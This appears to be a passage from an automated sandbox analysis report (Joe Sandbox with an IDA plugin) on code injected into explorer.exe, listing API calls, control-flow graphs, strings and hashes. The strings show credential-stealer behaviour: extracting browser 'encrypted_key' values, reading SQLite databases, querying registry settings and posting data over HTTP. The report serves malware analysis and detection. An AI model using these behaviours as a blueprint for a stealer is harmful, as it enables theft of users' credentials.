                                                                                                                                                                                                                                • Part of subcall function 02D6106C: lstrlen.KERNEL32(031F711E,00000000,00000000,00000000,02D61366,74DE8A60,031F711E,00000000), ref: 02D61074
                                                                                                                                                                                                                                • Part of subcall function 02D6106C: MultiByteToWideChar.KERNEL32(00000000,00000000,031F711E,00000001,00000000,00000000), ref: 02D61086
                                                                                                                                                                                                                                • Part of subcall function 02D612A3: RtlZeroMemory.NTDLL(?,00000018), ref: 02D612B5
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 02D613C2
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02D614B5
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02D61594
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Content-Type: application/x-www-form-urlencoded, xrefs: 02D614FB
                                                                                                                                                                                                                              • Accept: */*Referer: %S, xrefs: 02D614AF
                                                                                                                                                                                                                              • POST, xrefs: 02D61465
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                                                                                                              • API String ID: 3833683434-704803497
                                                                                                                                                                                                                              • Opcode ID: 106e1f270ef204c401902709d7c923a39375e880bb6b4ad8e90a3fef53aa76c2
                                                                                                                                                                                                                              • Instruction ID: 6dea42065d4a8be2a3270a9d65e361f22c4648c183a96c62643930dbdf5b75ab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 106e1f270ef204c401902709d7c923a39375e880bb6b4ad8e90a3fef53aa76c2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34712671A08341EFD7119F649898A2BBBEDEB88344F10492DF999D3351DB70DD04CBA2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 667 2d6b1e5-2d6b20b 668 2d6b221-2d6b22a 667->668 669 2d6b20d-2d6b218 call 2d6aeea 667->669 671 2d6b240-2d6b243 668->671 672 2d6b22c-2d6b237 call 2d6ae65 668->672 678 2d6b21e 669->678 679 2d6b3ea-2d6b3f0 669->679 675 2d6b3b9-2d6b3d3 671->675 676 2d6b249-2d6b26b call 2d6a7ae 671->676 684 2d6b3b4-2d6b3b7 672->684 685 2d6b23d 672->685 677 2d6b3db-2d6b3df 675->677 689 2d6b296-2d6b29f 676->689 690 2d6b26d-2d6b278 676->690 682 2d6b3e1-2d6b3e3 677->682 683 2d6b3e8 677->683 678->668 682->683 688 2d6b3e5-2d6b3e7 682->688 683->679 684->675 687 2d6b3d5-2d6b3d8 684->687 685->671 687->677 688->683 691 2d6b2d6-2d6b2ea call 2d66a5a 689->691 692 2d6b2a1 689->692 693 2d6b27d-2d6b291 call 2d6a1c6 690->693 702 2d6b2f6-2d6b2fd 691->702 703 2d6b2ec-2d6b2f1 691->703 694 2d6b2a3-2d6b2a7 692->694 695 2d6b2a9-2d6b2ad 692->695 693->684 694->691 694->695 695->684 698 2d6b2b3-2d6b2b9 call 2d6a67c 695->698 707 2d6b2be-2d6b2c2 698->707 704 2d6b373 702->704 705 2d6b2ff-2d6b30e 702->705 703->684 708 2d6b377-2d6b37a 704->708 705->708 707->691 709 2d6b2c4-2d6b2d4 707->709 710 2d6b310-2d6b329 CreateFileMappingW 708->710 711 2d6b37c 708->711 709->693 712 2d6b37e-2d6b3ab call 2d6a1c6 710->712 713 2d6b32b-2d6b357 MapViewOfFile 710->713 711->684 712->684 718 2d6b3ad 712->718 713->712 714 2d6b359-2d6b370 713->714 714->704 718->684
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 02D6B31D
                                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 02D6B34F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateMappingView
                                                                                                                                                                                                                              • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                                                              • API String ID: 3452162329-3826999013
                                                                                                                                                                                                                              • Opcode ID: 293d3e8e0ac978c164f2dbe6e1dbe30a9a53af99fa06d6870233a3215dd94d79
                                                                                                                                                                                                                              • Instruction ID: 4f98ffc4cd89558e3756d77378f0152e959d20c2ce79d8f03abdc0d8ff9b8b38
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 293d3e8e0ac978c164f2dbe6e1dbe30a9a53af99fa06d6870233a3215dd94d79
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31518E716047019FDB25CF18C888A7A77E6EB88318F14892EE986DB351DB70EC15CB51

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 719 2d6a40e-2d6a424 720 2d6a426-2d6a42a 719->720 721 2d6a4a2-2d6a4aa 719->721 723 2d6a431-2d6a441 720->723 724 2d6a42c-2d6a42f 720->724 722 2d6a4ae-2d6a4c8 721->722 727 2d6a4cc-2d6a4e3 ReadFile 722->727 725 2d6a443 723->725 726 2d6a469-2d6a4a0 memcpy 723->726 724->721 724->723 728 2d6a445-2d6a448 725->728 729 2d6a44a-2d6a45a memcpy 725->729 726->722 730 2d6a524-2d6a538 call 2d6a2aa 727->730 731 2d6a4e5-2d6a4ee 727->731 728->726 728->729 732 2d6a45d 729->732 730->732 737 2d6a53e-2d6a553 memset 730->737 731->730 738 2d6a4f0-2d6a4ff call 2d6a250 731->738 734 2d6a45f-2d6a466 732->734 737->734 738->727 741 2d6a501-2d6a51f call 2d6a1c6 738->741 741->734
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$FileReadmemset
                                                                                                                                                                                                                              • String ID: winRead
                                                                                                                                                                                                                              • API String ID: 2051157613-2759563040
                                                                                                                                                                                                                              • Opcode ID: f30bd17aa3b2588d1ebc9dd2dcafa7508e09721efffb93e225e668c3e6b9b0be
                                                                                                                                                                                                                              • Instruction ID: 8fbc98c9553691eb1b67625f05246b4cc84611bbf2f53102713f3b19a9bc8f1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f30bd17aa3b2588d1ebc9dd2dcafa7508e09721efffb93e225e668c3e6b9b0be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58316D72605245ABD750DE28DC889AF77E6EFC8314F845929F98AA7310D730ED05CBA2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • StrStrIW.KERNELBASE(?,?), ref: 02D62E4B
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 02D62EE4
                                                                                                                                                                                                                              • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02D62F54
                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 02D62F62
                                                                                                                                                                                                                                • Part of subcall function 02D619E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A1E
                                                                                                                                                                                                                                • Part of subcall function 02D619E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A3C
                                                                                                                                                                                                                                • Part of subcall function 02D619E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A75
                                                                                                                                                                                                                                • Part of subcall function 02D619E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A98
                                                                                                                                                                                                                                • Part of subcall function 02D61BC5: lstrlenW.KERNEL32(00000000,00000000,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61BCC
                                                                                                                                                                                                                                • Part of subcall function 02D61BC5: StrStrIW.SHLWAPI(00000000,.exe,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61BF0
                                                                                                                                                                                                                                • Part of subcall function 02D61BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61C05
                                                                                                                                                                                                                                • Part of subcall function 02D61BC5: lstrlenW.KERNEL32(00000000,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61C1C
                                                                                                                                                                                                                                • Part of subcall function 02D61AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02D62E83,PathToExe,00000000,00000000), ref: 02D61B16
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                                                                                                                              • String ID: PathToExe
                                                                                                                                                                                                                              • API String ID: 1799103994-1982016430
                                                                                                                                                                                                                              • Opcode ID: 4a71a26657e7e07eaff35fa65f2502957be72099aa8d25c3d9f9f4fc83a11e94
                                                                                                                                                                                                                              • Instruction ID: f1522e5caaa12f2284a39d9e044abe42c4a3abcab7e8adb47f27a66eccc7e96c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a71a26657e7e07eaff35fa65f2502957be72099aa8d25c3d9f9f4fc83a11e94
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E313771604211AF9B15AF62881C97FBAAAEFC4750F04852DFC6997384EA34CD06DFA1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 782 2d6a67c-2d6a692 783 2d6a694-2d6a6bf _alldiv _allmul 782->783 784 2d6a6c1-2d6a6c4 782->784 785 2d6a6c7-2d6a6d2 call 2d6a33b 783->785 784->785 788 2d6a6d4-2d6a6df 785->788 789 2d6a6f0-2d6a6fb SetEndOfFile 785->789 790 2d6a6e4-2d6a6ee call 2d6a1c6 788->790 791 2d6a71e 789->791 792 2d6a6fd-2d6a708 789->792 794 2d6a722-2d6a726 790->794 791->794 792->791 800 2d6a70a-2d6a71c 792->800 797 2d6a73a-2d6a740 794->797 798 2d6a728-2d6a72b 794->798 798->797 799 2d6a72d 798->799 801 2d6a734-2d6a737 799->801 802 2d6a72f-2d6a732 799->802 800->790 801->797 802->797 802->801
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File_alldiv_allmul
                                                                                                                                                                                                                              • String ID: winTruncate1$winTruncate2
                                                                                                                                                                                                                              • API String ID: 3568847005-470713972
                                                                                                                                                                                                                              • Opcode ID: d80d43b297c3612682afc48782943d40d81d95ed84bca50cd2e147f2f44cf557
                                                                                                                                                                                                                              • Instruction ID: 85843300b8ad424273041c17ef5dadd808535241c7a833dbd8b55a4f07d159eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d80d43b297c3612682afc48782943d40d81d95ed84bca50cd2e147f2f44cf557
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E21AC72200200ABDB149E69CC98EB777AAEF84310F158169ED85EB385D735DC10CBB1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02D64AA2
                                                                                                                                                                                                                              • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 02D64AC7
                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 02D64AD4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                                                                                                                                              • String ID: %s\%08x$Software
                                                                                                                                                                                                                              • API String ID: 1800864259-1658101971
                                                                                                                                                                                                                              • Opcode ID: a12f49f359fdfa0ba1d86e96437f03888921581c35f0829759dc97faab05ef72
                                                                                                                                                                                                                              • Instruction ID: 895ece4b911af616cf41035d211d2912b8d037836503e3f1419aef388437ce16
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a12f49f359fdfa0ba1d86e96437f03888921581c35f0829759dc97faab05ef72
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68012471A04008FFAB188F81DC4EDBF77ADEB44244F50006EF505A3340DA719D00A6A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _alloca_probe.NTDLL ref: 02D6431C
                                                                                                                                                                                                                              • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 02D64335
                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02D64363
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02D643C8
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994
                                                                                                                                                                                                                                • Part of subcall function 02D6418A: wsprintfW.USER32 ref: 02D64212
                                                                                                                                                                                                                                • Part of subcall function 02D61011: GetProcessHeap.KERNEL32(00000000,00000000,?,02D61A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2), ref: 02D61020
                                                                                                                                                                                                                                • Part of subcall function 02D61011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61027
                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02D643B9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 801677237-0
                                                                                                                                                                                                                              • Opcode ID: de67f8140c433e36fb3affc4db018b3794f28cd0f4d84ee199b2a5ed5af3ad59
                                                                                                                                                                                                                              • Instruction ID: 0f12f55fd6312fe9be1c46aa9b0665b05e8c2cefc3a9766f99cc91f72f0bbfc7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de67f8140c433e36fb3affc4db018b3794f28cd0f4d84ee199b2a5ed5af3ad59
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B1160B1508205AFE7169B20DC48EBF77EDEB88304F00492EB589D2340EB74ED589A72
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.NTDLL ref: 02D6B8D5
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 02D6B96F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFilememset
                                                                                                                                                                                                                              • String ID: psow$winOpen
                                                                                                                                                                                                                              • API String ID: 2416746761-4101858489
                                                                                                                                                                                                                              • Opcode ID: 703dbcd214232fb2aaa9ed3a8eef12bbbf4f8461fbdd59f0da93eda41593c03c
                                                                                                                                                                                                                              • Instruction ID: 11ac7f82dcc00dcb1d82aab3cd9d8b31c586cad1ff03198e3e8bfdfe1e6e134b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 703dbcd214232fb2aaa9ed3a8eef12bbbf4f8461fbdd59f0da93eda41593c03c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4714C71A087029FD710DF24C88476ABBE5FF48728F104A2AE8A5E7381D775DD54CBA2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A1E
                                                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A3C
                                                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A75
                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A98
                                                                                                                                                                                                                                • Part of subcall function 02D61011: GetProcessHeap.KERNEL32(00000000,00000000,?,02D61A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2), ref: 02D61020
                                                                                                                                                                                                                                • Part of subcall function 02D61011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61027
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 217796345-0
                                                                                                                                                                                                                              • Opcode ID: 26da3d7857c45d655a608b0479b875c0973eab8e4e0139ed2b3d508b9efcefd0
                                                                                                                                                                                                                              • Instruction ID: 5296e16a88b5830604c9116d72cbd51d2f19f0e22e2d8b8ecc510867b75c3ef3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26da3d7857c45d655a608b0479b875c0973eab8e4e0139ed2b3d508b9efcefd0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E821A672609341AFEB258A21CD48F7B77EDEBC4758F144A1DF59992340D722CD05C671
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyW.ADVAPI32(?,?,?), ref: 02D61ED5
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D61F0C
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02D61F98
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994
                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D61F82
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1077800024-0
                                                                                                                                                                                                                              • Opcode ID: cce03fb55b19e29c0a4b7d789e3002392cbca7a7b30d2ef2c287eb7bff00ff04
                                                                                                                                                                                                                              • Instruction ID: 840da756c5258a838d4c8ffd4cd8855150e54e614844cd14c19d3ac47010db81
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cce03fb55b19e29c0a4b7d789e3002392cbca7a7b30d2ef2c287eb7bff00ff04
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02214872608201AFDB059B61DC48E3BBBEEEF88244F00892DF89992350DB75DD15DB62
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02D63E1E,00000000,?,02D63FA8), ref: 02D61C46
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,02D63FA8), ref: 02D61C56
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,02D63FA8), ref: 02D61C91
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,02D63FA8), ref: 02D61C76
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2517252058-0
                                                                                                                                                                                                                              • Opcode ID: 9eb0f586a4987017e442c84b63271dfa765cbd8277c158a15a4eb1de6da89549
                                                                                                                                                                                                                              • Instruction ID: 3a3d65756e4c309a74f99e7f473212f3da2c406c06c6b5616d7272e14c1a42c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eb0f586a4987017e442c84b63271dfa765cbd8277c158a15a4eb1de6da89549
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FDF0F432200218BBC2211A26DC8CF7FBB6DDB426FAF220B18F409D23C0DB12DC1191B0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,02D63E30,00000000,00000000,?,02D63FA8), ref: 02D62FC1
                                                                                                                                                                                                                              • lstrlen.KERNEL32("encrypted_key":",?,02D63FA8), ref: 02D62FCE
                                                                                                                                                                                                                              • StrStrIA.SHLWAPI("encrypted_key":",02DB692C,?,02D63FA8), ref: 02D62FDD
                                                                                                                                                                                                                                • Part of subcall function 02D6190B: lstrlen.KERNEL32(?,?,?,?,00000000,02D62783), ref: 02D6192B
                                                                                                                                                                                                                                • Part of subcall function 02D6190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02D62783), ref: 02D61930
                                                                                                                                                                                                                                • Part of subcall function 02D6190B: lstrcat.KERNEL32(00000000,?), ref: 02D61946
                                                                                                                                                                                                                                • Part of subcall function 02D6190B: lstrcat.KERNEL32(00000000,00000000), ref: 02D6194A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                              • String ID: "encrypted_key":"
                                                                                                                                                                                                                              • API String ID: 493641738-877455259
                                                                                                                                                                                                                              • Opcode ID: aff79038ee2fbeb6f2806ec42400b6762ad5179c8978b7436fe1a67130a69f0d
                                                                                                                                                                                                                              • Instruction ID: 4d9b57cf1291911bc722e7867e3fa3d3cff8f1f130edf0887ca52964eb038f84
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aff79038ee2fbeb6f2806ec42400b6762ad5179c8978b7436fe1a67130a69f0d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74E06822F4A725DF93236BB62CAC8A73F1C9F0A6553080068FA02D3302DF82CC01C2E0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 02D6BB40
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID: winDelete
                                                                                                                                                                                                                              • API String ID: 3188754299-3936022152
                                                                                                                                                                                                                              • Opcode ID: c3b20fde4f9dc8f662aa4de25aecce24f5ab8300999ed940a8027e761f08d7b1
                                                                                                                                                                                                                              • Instruction ID: 6b8a12f346f3a1f26c343e208931c684caad95561c6e6d2c1ed5970e8af2eb78
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3b20fde4f9dc8f662aa4de25aecce24f5ab8300999ed940a8027e761f08d7b1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41110831A4021AEB9711AB7DD84897D7776DF81768F204527E84AF7384DB30CD02DB61
                                                                                                                                                                                                                              APIs
